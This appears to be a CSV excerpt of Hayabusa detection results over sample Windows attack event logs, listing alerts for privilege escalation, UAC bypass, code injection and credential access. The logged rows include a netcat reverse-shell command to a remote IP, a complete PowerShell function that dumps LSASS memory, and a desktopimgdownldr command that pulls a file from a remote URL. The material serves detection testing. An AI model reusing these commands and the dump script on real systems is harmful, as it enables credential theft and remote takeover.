Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,medium,,Pipe 
Connected_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-545A-5EBA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | Process: C:\Users\IEUser\Tools\Misc\nc64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | LID: 0x3e7 | PID: 4468 | PGUID: 747F3D96-DE14-5EB9-0000-00107C0F4300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | LID: 0x3e7 | PID: 224 | PGUID: 747F3D96-DE14-5EB9-0000-001079154300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 5252 | PGUID: 747F3D96-DE32-5EB9-0000-00103FC14300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Akagi.exe 58 c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89eef | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.183 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - Rogue Windir - UAC bypass prep | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: C:\Users\IEUser\AppData\Local\Temp\DNeruK | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.184 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 328 310 0000028A37652590 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6968 | PGUID: 747F3D96-BB89-5EBA-0000-0010FB4C3600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | Process: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41} | LID: 0x89ebf | PID: 1088 | PGUID: 747F3D96-BB89-5EBA-0000-001042653600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 
+09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | LID: 0x89ebf | PID: 4688 | PGUID: 747F3D96-BB89-5EBA-0000-001019683600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | LID: 0x3e7 | PID: 8052 | PGUID: 747F3D96-3F20-5EBB-0000-0010035E3600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3080 | PGUID: 747F3D96-3F44-5EBB-0000-001017813700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6344 | PGUID: 
747F3D96-3F44-5EBB-0000-0010EA933700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6372 | PGUID: 747F3D96-3F44-5EBB-0000-0010D29A3700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 1516 | PGUID: 
747F3D96-CA4E-5EC9-0000-00109FE23700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:50.330 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 4456 | PGUID: 747F3D96-CA52-5EC9-0000-001027FA3700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts 
Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. 
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. 
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,low,Evas,Use Remove-Item to Delete File,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,Evasion Suspicious NtOpenProcess Call | Src Process: C:\Users\Public\za3bollo.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1972 | Src PGUID: 747F3D96-A591-5EFB-0000-00109FE4CC01 | Tgt PID: 2996 | Tgt PGUID: 
747F3D96-59BB-5EFB-0000-0010D81B6400,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Exec,Direct Syscall of NtOpenProcess,,../hayabusa-rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: spooler.exe payload.bin | Process: C:\Users\Public\tools\cinj\spooler.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89c8f | PID: 6892 | PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00 | Hash: SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.822 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\conhost.exe | Tgt Process: c:\Users\Public\tools\cinj\spooler.exe | Src 
User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 640 | Src PGUID: 747F3D96-1E44-5EFE-0000-001060463700 | Tgt PID: 6892 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3344 | PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\spoolsv.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 747F3D96-1CDA-5EFE-0000-0010E0780100 | Tgt PID: 3344 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: chost.exe payload.bin | Process: C:\Users\Public\tools\evasion\chost.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" | LID: 0x37e846b4 | PID: 16900 | PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A | Hash: 
SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.617 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\Users\Public\tools\evasion\chost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16900 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1 | LID: 0x37e846b4 | PID: 16788 | PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Conhost Parent Process Executions,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 
+09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16788 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89ccc | PID: 1932 | PGUID: 747F3D96-F098-5EFE-0000-001012E13801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 